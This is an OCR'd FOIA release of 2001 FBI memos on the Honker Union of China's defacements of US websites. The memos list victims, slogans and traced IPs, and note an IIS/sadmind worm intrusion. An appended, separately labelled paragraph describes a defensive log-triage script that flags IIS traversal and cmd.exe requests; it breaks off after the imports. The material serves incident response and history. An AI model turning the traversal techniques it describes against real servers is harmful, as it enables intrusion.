(This group hosts a Pennsylvania State Government Labor and Industry 
web site known as "PA New Hires.com") 


APR SUPPLY COMPANY (APR SUPPLY.COM) 
305 North 5th Street 


Lebanon, PA 17022 
POC; 
Telephon 


Commonwealth of Pennsylvania (Three separate web 
sites)(CHIPS@state.pa.us/PSERS@state.pa.us/and one other) 

Commonwealth Technology Center (CTC) 

] Technology Park 


Harrisburg, Pennsylvania 
POC: 
Telephon 


CIBER 


5/17/01 


EE Cc ene 
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650 Wilson Lane 


Mechanicsburg, PA 17055 
POC: : b6 
Telephon l b7C 


I also understand some Navy Depot web sites were hit, but details are n[...] 
POC: [redacted] DCIS, 717/770-2894 is collecting data. 


Do you want an EC on the above? 


[— 


5/17/01 


(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/03/2001 
To: San Francisco Attn: Squad 14B - Computer Intrusion 
b6 
From: Chicago b7C 
Squad IP/C b7E 


Contact: SA 312/786-3918 
Approved By: 


Drafted By: 


Case ID #: (Pending) 

Title: Subject:  Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for SA [redacted] to perform appropriate investigation. 


Administrative: Reference telephone call between SA [redacted] and SA [redacted] on May 3, 2001. 


Details: [redacted] May 3, 2001, by [redacted] at Charles Schwab & Company, [redacted] Schwab's Web sites, www.schwabplan.com, had been defaced. The defacement was discovered late in the afternoon of May 3. The defacement has a derogatory statement towards the United States government and a derogatory statement towards "PoizonBOx". 


Analysis of how the attack was carried out is still 
ongoing. 


To: [redacted] From: Chicago 
Re: [redacted] 05/03/2001 


LEAD (s): 
Set Lead 1: 
SAN FRANCISCO 
AT SAN FRANCISCO, CA 


It is requested that SA [redacted] conduct appropriate investigation and forward results to SA [redacted]. 

** 


b3 
b7E 


b6 
b7C 




(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 


To: Washington Field Attn:  NIPC Squad 
SSA [redacted] 


From: Chicago 
Squad IP/C 
Contact: 


SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID #: (Pending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for Washington Field Office, NIPC Squad, SA [redacted]. 


Administrative: Reference telephone call on May 8, 2001, between [redacted]. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, SA [redacted] contacted SA [redacted] to inform that Washington Field Office was receiving numerous complaints regarding Web site defacements possibly attributable to Chinese hackers. 


b3 
b6 
b7C 
b7E 


b6 
b7C 


To: Washington Field From: Chicago 
Re: [redacted] 05/22/2001 


LEAD (s): 
Set Lead 1: 
WASHINGTON FIELD 


AT WASHINGTON, D.C. 


It is requested that SA [redacted] perform appropriate investigation, more specifically, obtain log files from the victim servers and provide FD 302s regarding the defacements and log files, and forward all information to SA [redacted]. 


++ 


b7E 


b6 
b7C 


(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: Washington Field Attn: Squad NS 18 b3 
b7C 
From: Chicago b7E 
Squad IP/C 
Contact: SA [redacted] 312/786-3918 


Approved By: 
Drafted By: 
Case ID #: (Pending) 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for Washington Field Office, NIPC Squad,
SA [redacted].

b7C
Administrative: Reference telephone call between SA [redacted] and
SA [redacted] on May 9, 2001.


Details: The Computer Investigations Unit (CIU) was contacted by
Detective [redacted] of the United States Capitol Police. Detective
[redacted] informed CIU that [redacted] received a call on Monday, April 30,
2001, at approximately 5:00 pm from the United States House of
Representatives Publication Services Department advising that
their Web page had been defaced.


The defacement contained the phrase, written in 
English, "What happened to this U.S. Site?", signed "nanilnanl". 
The logs from the intrusion have been preserved and the origin of 
the attack has been traced to "nanlnanl.51.net" in China. 


b3 
b6 


b7C 




To: Washington Field From: Chicago
b7E


LEAD(s): 
Set Lead 1: 
WASHINGTON FIELD 


AT WASHINGTON, DC 


It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim server and provide an FD 302 regarding the defacement and
log files, and forward all information to SA [redacted]. SA [redacted]
has been provided advance copies of the necessary information.
b6
b7C


++ 


(01/26/1998)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: St. Louis Attn: NIPC Squad
From: Chicago
Squad IP/C
b3
b7C
b7E


Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID #: [redacted] (Pending)


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for St. Louis Division, NIPC Squad, SA
[redacted].
b6
b7C
Administrative: Reference telephone call between SA [redacted] and SA
[redacted] on May 8, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honker Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, SA [redacted] contacted SA [redacted] to inform
that St. Louis Division had received a complaint regarding a Web 
site defacement attributable to the Honker Union of China. The 
victim Web site belonged to Cybercon, Inc., 210 North Tucker, 
Seventh Floor, St. Louis, Missouri. 


After the defacement, the Web site showed a picture of 
the Chinese flag, a statement "President is Murderer" and another 
statement that the Honker Union of China was responsible. 


To: St. Louis From: Chicago 
b7E 


LEAD(s):
Set Lead 1: 
ST. LOUIS 
AT ST. LOUIS, MO 
It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD 302s regarding the defacements and
log files, and forward all information to SA [redacted].
b6
b7C


** 


FEDERAL BUREAU OF INVESTIGATION 


(01/26/1998) 


Precedence: ROUTINE Date: 05/12/2001 


To: Sacramento Attn: Squad 5
SSA [redacted]


From: Chicago 
Squad IP/C 
Contact: SA [redacted] 312/786-3918
Approved By: 


Drafted By: 


Case ID #: [redacted] (Pending)

Title: Subject:  Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Sacramento Division, Squad 5, SA [redacted].


Administrative: Reference telephone call between SA [redacted] and
SA [redacted] on May 11, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 11, 2001, SA [redacted] contacted SA [redacted] to inform
that Sacramento Division was receiving numerous complaints
regarding Web site defacements possibly attributable to Chinese
hackers. Many of the sites contained the following statement,
"fuck USA Government fuck PoizonBOx
contact:sysadmin@yahoo.com.cn", a common statement seen on many
of the defacements reported by other divisions.


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b3 
b6 
b7C 
b7E 


b6 
b7C 


To: Sacramento From: Chicago 
b7E 


LEAD(s): 
Set Lead 1: 
SACRAMENTO 
AT SACRAMENTO, CA 
It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD 302s regarding the defacements and
log files, and forward all information to SA [redacted].
b6
b7C


++ 


FEDERAL BUREAU OF INVESTIGATION 


(01/26/1998) 


Precedence: ROUTINE Date: 05/12/2001 
To: Dallas Attn: NIPC Squad
SSA [redacted]
From: Chicago
Squad IP/C
Contact: SA [redacted] 312/786-3918
b3
b6
b7C
b7E
Approved By: 
Drafted By: 
Case ID #: [redacted] (Pending)
Title: Subject:  Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 
Synopsis: To set leads for Dallas Division, NIPC Squad.
b6
b7C


Administrative: Reference telephone call between [redacted]
and SA [redacted] on May 8, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, [redacted] contacted SA [redacted] to
inform that Dallas Division was receiving numerous complaints
regarding Web site defacements possibly attributable to Chinese
hackers. Many of the sites contained the following statement,
"fuck USA Government fuck PoizonBOx
contact:sysadmin@yahoo.com.cn", a common statement seen on many
of the defacements reported by other divisions.


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b6
b7C


To: Dallas From: Chicago
Re: [redacted] 05/12/2001 b3


b7E 
LEAD(s): 
Set Lead 1: 
DALLAS 
AT DALLAS, TX 
It is requested that Dallas Division, NIPC Squad, 
perform appropriate investigation, more specifically, obtain log 
files from the victim servers and provide FD 302s regarding the 
defacements and log files, and forward all information to SA 
b6 
b7C 


** 


(01/26/1998)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 


To: Mobile Attn: Squad 5
SSA [redacted]


From: Chicago 
Squad IP/C 
Contact: SA [redacted] 312/786-3918
Approved By: 


Drafted By: 


Case ID #: [redacted] (Pending)

Title: Subject: Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Mobile Division, Squad 5, SA [redacted].


Administrative: Reference telephone call between SA [redacted] and
SA [redacted] on May 9, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 9, 2001, SA [redacted] contacted SA [redacted] to inform
that Mobile Division was receiving numerous complaints regarding 
Web site defacements possibly attributable to Chinese hackers. 
Many of the sites contained the following statement, "fuck USA 
Government fuck PoizonBOx contact:sysadmin@yahoo.com.cn", a 
common statement seen on many of the defacements reported by 
other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b3
b6
b7C
b7E


b6
b7C


b3
b6
b7C
b7E


To: Mobile From: Chicago 
b7E 


LEAD(s): 
Set Lead 1: 
MOBILE 


AT MOBILE, AL 


b6 


It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD 302s regarding the defacements and
log files, and forward all information to SA [redacted].


** 


(01/26/1998)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: Milwaukee Attn: Squad 5
SSA [redacted]
From: Chicago
b3
b6
b7C
b7E
Squad IP/C 


Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID #: [redacted] (Pending)


Title: Subject: Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion


Date: 04/03/2001


Synopsis: To set leads for Milwaukee Division, Squad 5, SAs
[redacted].


Administrative: Reference telephone call between SAs [redacted]
and SA [redacted] on May 9, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page
defacements.

On May 9, 2001, SAs [redacted] contacted SA
[redacted] to inform that Milwaukee Division was receiving numerous
complaints regarding Web site defacements possibly attributable
to Chinese hackers. Many of the sites contained the following
statement, "fuck USA Government fuck PoizonBOx
contact:sysadmin@yahoo.com.cn", a common statement seen on many
of the defacements reported by other divisions.


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b7E


b3
b6
b7C


To: Milwaukee From: Chicago
Re: [redacted] 05/12/2001


LEAD (s): 
Set Lead 1: 
MILWAUKEE 
AT MILWAUKEE, WI 


It is requested that SAs [redacted] perform
appropriate investigation, more specifically, obtain log files
from the victim servers and provide FD 302s regarding the
defacements and log files, and forward all information to SA
[redacted].


++ 


b3
b7E


b6
b7C


(01/26/1998)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 

To: Charlotte Attn: Raleigh, NC Resident Agency 
Squad 7 
SA 


From: Chicago 
Squad IP/C 
Contact: SA [redacted] 312/786-3918
Approved By: 
Drafted By: 
Case ID #: [redacted] (Pending)


Title: Subject: Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Charlotte Division, Raleigh, NC
Resident Agency, SA [redacted].


Administrative: Reference telephone call between SA [redacted] and
SA [redacted] on May 9, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 9, 2001, SA [redacted] contacted SA [redacted] to inform
that he was receiving numerous complaints regarding Web site
defacements possibly attributable to Chinese hackers. Many of
the sites contained the following statement, "fuck USA Government
fuck PoizonBOx contact:sysadmin@yahoo.com.cn", a common statement
seen on many of the defacements reported by other divisions.


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b7E 


b6 
b7C 




To: Charlotte From: Chicago
Re: [redacted] 05/12/2001 b3


b7E 
LEAD (s): 
Set Lead 1: 
CHARLOTTE 
AT RALEIGH, NC 
It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD 302s regarding the defacements and
log files, and forward all information to SA [redacted].
b6
b7C


++ 


FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE Date: 05/12/2001 
To: Boston Attn: Squad C-11
From: Chicago
b3
b7C
b7E
Squad IP/C 
Contact: SA 312/786-3918 


Approved By: 
Drafted By: 
Case ID #: 


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Boston Division, Squad C-11, SA
[redacted].
b6
b7C


Administrative: Reference telephone call between SA [redacted] and SA
[redacted] on May 9, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 9, 2001, SA [redacted] contacted SA [redacted] to inform
that Boston Division was receiving numerous complaints regarding 
Web site defacements possibly attributable to Chinese hackers. 
Many of the sites contained the following statement, "fuck USA 
Government fuck PoizonBOx contact:sysadmin@yahoo.com.cn", a 
common statement seen on many of the defacements reported by 
other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


To: Boston From: Chicago


Re: [redacted] 05/12/2001


LEAD(s): 
Set Lead 1: 
BOSTON 


AT BOSTON, MA 


It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD 302s regarding the defacements and
log files, and forward all information to SA [redacted].


++ 


b3 
b7E 


b6 
b7C 


(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 


To: Detroit Attn: Bay City, MI, Resident Agency
SA [redacted]


From: Chicago 
Squad IP/C 
Contact: SA [redacted] 312/786-3918
Approved By: 
Drafted By: 
Case ID #: [redacted] (Pending)


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Detroit Division, Bay City, Michigan
Resident Agency, SA [redacted].


Administrative: Reference telephone call between SA [redacted] and SA
[redacted] on May 9, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 9, 2001, SA [redacted] contacted SA [redacted] to inform
that SA [redacted] had received a complaint regarding a Web site
defacement possibly attributable to Chinese hackers. The site
defaced was www.ironmans.net. The site contained the following
statement, "fuck USA Government fuck PoizonBOx
contact:sysadmin@yahoo.com.cn", a common statement seen on many
of the defacements reported by other divisions.


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b6 
b7C 
b7E 


b6 
b7C 


b7C 


To: Detroit From: Chicago
Re: [redacted] 05/12/2001


LEAD (s): 
Set Lead 1: 
DETROIT 
AT BAY CITY, MI 
It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim server and provide an FD 302 regarding the defacement and
log files, and forward all information to SA [redacted].


++


b3 
b7E 


b6 
b7C 


(01/26/1998)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: New Haven Attn:  NIPC Squad
From: Chicago
Squad IP/C
b3
b7C
b7E


Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID #: [redacted] (Pending)


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for New Haven Division, NIPC Squad, SA
[redacted].
b6
b7C


Administrative: Reference telephone call between SA [redacted] and
SA [redacted] on May 8, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, SA [redacted] contacted SA [redacted] to inform
that New Haven Division had received two complaints regarding Web
site defacements possibly attributable to Chinese hackers. The
sites were www.c2aircraft.com, the Web site for Command
Technology, and www.americares.com, the Web site for Americares
Company. The site for Command Technologies contained the
following statement, "fuck USA Government fuck PoizonBOx
contact:sysadmin@yahoo.com.cn", a common statement seen on many
of the defacements reported by other divisions.


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b7C


To: New Haven From: Chicago
Re: [redacted] 05/12/2001 b3


b7E


Details for the Americares defacement were not 
available at the time of the telephone call. 




LEAD (s): 
Set Lead 1: 
NEW HAVEN 
AT NEW HAVEN, CT 
It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD 302s regarding the defacements and
log files, and forward all information to SA [redacted].
b6
b7C


++ 


(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/12/2001 
To: New Orleans Attn: Squad 6
SSA [redacted]
From: Chicago
Squad IP/C
b3
b7C
b7E


Contact: SA 312/786-3918 
Approved By: 
Drafted By: 
Case ID #: [redacted] (Pending)


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for New Orleans Division, Squad 6, SAs [redacted].
b6
b7C


Administrative: Reference telephone call between SAs [redacted]
and SA [redacted] on May 8, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 8, 2001, SAs [redacted] contacted SA [redacted] to
inform that New Orleans Division had received a complaint from
Tulane University regarding a Web site defacement with the
following statement, "fuck USA Government fuck PoizonBOx
contact:sysadmin@yahoo.com.cn", a common statement seen on many
of the defacements reported by other divisions. The defacement
was on the Web site for the Tulane Primate Center,
www.tpc.tulane.edu.


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


To: New Orleans From: Chicago
Re: [redacted] 05/12/2001 b3


b7E


LEAD (s): 
Set Lead 1: 
NEW ORLEANS 
AT NEW ORLEANS, LA 


It is requested that SAs [redacted] perform
appropriate investigation, more specifically, obtain log files
from the victim servers and provide FD 302s regarding the
defacements and log files, and forward all information to SA
[redacted].
b6
b7C


++ 




FEDERAL BUREAU OF INVESTIGATION 


(01/26/1998) 


Precedence: ROUTINE Date: 05/12/2001 
To: Newark Attn:  NIPC Squad
From: Chicago
Squad IP/C
b3
b7C
b7E


Contact: SA 312/786-3918 
Approved By: 


Drafted By: 


Case ID #: [redacted]

Title: Subject:  Hacker/Honker Union of China 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


b6


Synopsis: To set leads for Newark Division, NIPC Squad, SAs [redacted].
Administrative: Reference telephone calls between SA [redacted] and SA
[redacted] on May 7 and 8, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 7 and 8, 2001, SAs [redacted]
contacted SA [redacted] to inform that Newark Division was receiving
numerous complaints regarding Web site defacements originating
from IP addresses in China with derogatory statements toward the
United States. Many of the sites contained the following
statement, "fuck USA Government fuck PoizonBOx
contact:sysadmin@yahoo.com.cn", a common statement seen on many
of the defacements to date reported by other divisions.


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 




To: Newark From: Chicago 
b7E 


LEAD(s): 
Set Lead 1: 
NEWARK 
AT NEWARK, NJ 


It is requested that SAs [redacted] perform
appropriate investigation, more specifically, obtain log files
from the victim servers and provide FD 302s regarding the
defacements and log files, and forward all information to SA
[redacted].
b6
b7C


** 


(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/09/2001 


To: Minneapolis Attn: Bismarck, ND Resident Agency
SA [redacted]


From: Chicago 
Squad IP/C 
Contact: SA [redacted] 312/786-3918
Approved By: 
Drafted By: 
Case ID #: [redacted]


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set lead for Minneapolis Division, Bismarck, ND
Resident Agency, SA [redacted].


Administrative: Reference telephone call between SA [redacted] and SA
[redacted] on May 7, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page
defacements. On May 7, 2001, SA [redacted] contacted SA [redacted] to
inform that the Web site of River City Boats and four Web sites
run by Schumacher Diamond Specialists had been the victims of a
Web site defacement. The statement on the Web sites, "fuck USA
Government fuck PoizonBOx contact:sysadmin@yahoo.com.cn", is a
common statement seen on many of the defacements to date reported
by other divisions. Other victims of this defacement have traced
the IPs back to the People's Republic of China.


b3 
b6 
b7C 
b7E 


b6 
b7C 


b7C
b7E


To: Minneapolis From: Chicago 
Re: [redacted] 05/09/2001


LEAD (s): 
Set Lead 1: 
MINNEAPOLIS 
AT BISMARCK, ND 
It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD 302s regarding the defacement and
log files, and forward all information to SA [redacted].


++ 


b3 
b7E 


b6 
b7C 


(01/26/1998)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/21/2001 
To: Houston Attn: NIPC Squad
From: Chicago
Squad IP/C
b3
b7C
b7E


Contact: SA [redacted] 312/786-3918
Approved By: 
Drafted By: 
Case ID #: [redacted] (Pending)


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Houston Division, NIPC Squad. 


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 14, 2001, SA [redacted] received, via e-mail,
information that Houston Division was receiving numerous
complaints regarding Web site defacements possibly attributable
to Chinese hackers.
b6
b7C


To: Houston From: Chicago
Re: [redacted] 05/21/2001 b3
b7E


LEAD(s):
Set Lead 1: 
HOUSTON 


AT HOUSTON, TX 


It is requested that the Houston Division NIPC Squad
perform appropriate investigation, more specifically, obtain log
files from the victim servers and provide FD 302s regarding the
defacements and log files, and forward all information to SA
[redacted].
b6
b7C


++ 


(01/26/1998)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/21/2001 


To: Philadelphia Attn:  NIPC Squad
SSA [redacted]


From: Chicago 
Squad IP/C 
Contact: SA [redacted] 312/786-3918
Approved By: 
Drafted By: 
Case ID #: [redacted] (Pending)


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Philadelphia Division, NIPC Squad, SA
[redacted].

Administrative: Reference telephone call between SA [redacted] and
SA [redacted] on May 21, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 21, 2001, SA [redacted] contacted SA [redacted] to inform
that Philadelphia Division had received numerous complaints
regarding Web site defacements possibly attributable to Chinese
hackers. Many of the sites contained the following statement,
"fuck USA Government fuck PoizonBOx
contact:sysadmin@yahoo.com.cn", a common statement seen on many
of the defacements reported by other divisions.


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 




b3 
b6 
b7C 
b7E 


b6 
b7C 


To: Philadelphia From: Chicago
Re: [redacted] 05/21/2001


LEAD (s): 
Set Lead 1: 
PHILADELPHIA 


AT PHILADELPHIA, PA 


It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD 302s regarding the defacements and
log files, and forward all information to SA [redacted].


++


b3
b7E


b6
b7C


(01/26/1998) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/21/2001 
To: Louisville Attn:  NIPC Squad
From: Chicago
b3
b7C
b7E
Squad IP/C 
Contact: SA 312/786-3918 


Approved By: 
Drafted By: 
Case ID #: [redacted]


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To set leads for Louisville Division, NIPC Squad, SA
[redacted].
b6
b7C


Administrative: Reference telephone call between SA [redacted] and
SA [redacted] on May 21, 2001.


Details: Chicago Division is the lead office for the criminal 
investigation of the Honkers Union of China, sometimes called the 
Hackers Union of China, specifically, actions against United 
States Web sites originating out of China. 


Many of the attacks have taken the form of Web page 
defacements. 


On May 21, 2001, SA [redacted] contacted SA [redacted] to
inform that Louisville Division had received three complaints 
regarding Web site defacements possibly attributable to Chinese 
hackers. The sites contained the following statement, "fuck USA 
Government fuck PoizonBOx contact:sysadmin@yahoo.com.cn", a 
common statement seen on many of the defacements reported by 
other divisions. 


Other victims of this defacement have traced the IPs 
back to the People's Republic of China. 


b3 
b6 
b7C 




To: Louisville From: Chicago
Re: [redacted] 05/21/2001 b3
b7E


LEAD(s):
Set Lead 1:
LOUISVILLE 
AT LOUISVILLE, KY 
It is requested that SA [redacted] perform appropriate
investigation, more specifically, obtain log files from the
victim servers and provide FD 302s regarding the defacements and
log files, and forward all information to SA [redacted].
b6
b7C


++ 


(Rev. 08-28-2000)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/21/20 
To: Chicago 
From: Chicago 

Squad IP/C 

Contact: SA [redacted] 312/786-3918


Approved By: 


Drafted By: 
Case ID #: [redacted] (Pending)


Title: Subject:  Hacker/Honker Union of China 


Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: To open Sub file for the above captioned case.

Details: Due to the large number of complaints received
regarding the above captioned case, it is requested the Sub file
listed below be opened:


[redacted] 01


++


b3 
b6 
b7C 
b7E 


b3 
b7E 




(Rev. 08-28-2000)


FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE Date: 05/23/2001 


To: Counterterrorism Attn: NIPC, CIU, SA [redacted]
Chicago
b7C


From: Cleveland
b7E


Squad 16
Contact: SA [redacted] (216) 622-6917


Approved By:
Drafted By: 


Case ID #: [redacted] (Pending)


Title:  UNSUB(S), CHINA; 
NORTH AMERICAN BENEFITS NETWORK, 
ROCKY RIVER, OH - VICTIM; 
COMPUTER INTRUSIONS 


Synopsis: To report complaint received at Cleveland Division re: 
victims of SADMIND/IIS worm originating from China. 


Enclosure: One original FD-71. 


Details: In response to a complaint received at Cleveland
Division, writer telephonically contacted [redacted],
North American Benefits Network (NABN), Detroit Road, Rocky River,
OH, work telephone number [redacted], on 05/09/2001. [Redacted]
advised as follows:


b6 
b7C 


On 05/08/2001, between 12:00pm and 1:00pm, three 
computers at NABN were compromised: 1) MS Windows NT v4.0 
(service pack 6a) server, MS Internet Information Server (IIS) 
v4.0, and MS Exchange v5.5, IP address 63.103.197.194; 2) Windows 
2000 Server, IIS v5.0, IP address 63.103.197.198; 3) Windows 2000 
Server, IIS v5.0, IP address 63.103.197.199. On all three 
computers, the home page was replaced with a page that said "fuck 
the U.S. government." The NT computer performs external mail 
functions and port 80 was open. The 2000 computers perform 
terminal services. 


The NABN firewall (a gnat machine), IP address 
63.103.197.196, logged the intruder's IP address as 
216.160.67.237. Said IP address is registered to Hammock 
Consulting Services Inc., 1005, High Avenue S, Renton, VA. 


b7E 


To: Counterterrorism From: Cleveland
Re: [redacted] 05/23/2001


As of 05/09/2001, the NT computer was offline as a 
result of the attack. The 2000 computers were offline for 
approximately 1.5 days as a result of the attack. 


Cleveland Division is providing the aforementioned 
information to NIPC for informational purposes and to Chicago 
Division for any action deemed appropriate. 
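The Cleveland memo above records an NT 4.0/IIS 4.0 host and two Windows 2000/IIS 5.0 hosts whose home pages were overwritten, a firewall log that captured the intruder's address, and, like every lead in this file, a request to obtain the victim servers' log files. The following is an added example, not part of the FBI file and not the Bureau's or any victim's tooling, showing the triage an examiner would run over an IIS W3C extended log: it normalizes each requested path the way IIS's lenient decoder did, including the overlong UTF-8 sequences used by the IIS "Web Server Folder Traversal" bug (MS00-078), which CERT Advisory CA-2001-11 identifies as the sadmind/IIS worm's Windows-side vector (that attribution comes from the advisory, not from this file); flags directory-traversal requests and requests reaching cmd.exe; and summarizes them per source address with first-contact time and whether the server answered 200. The log lines are constructed, use RFC 5737 documentation addresses rather than any address in this file, and are timed in the noon-to-1 pm Eastern window the memo gives (IIS keeps W3C extended logs in GMT, so 16:00); the OVERLONG table of two sequences is an assumption, not an exhaustive list.

```python
import re
from collections import Counter
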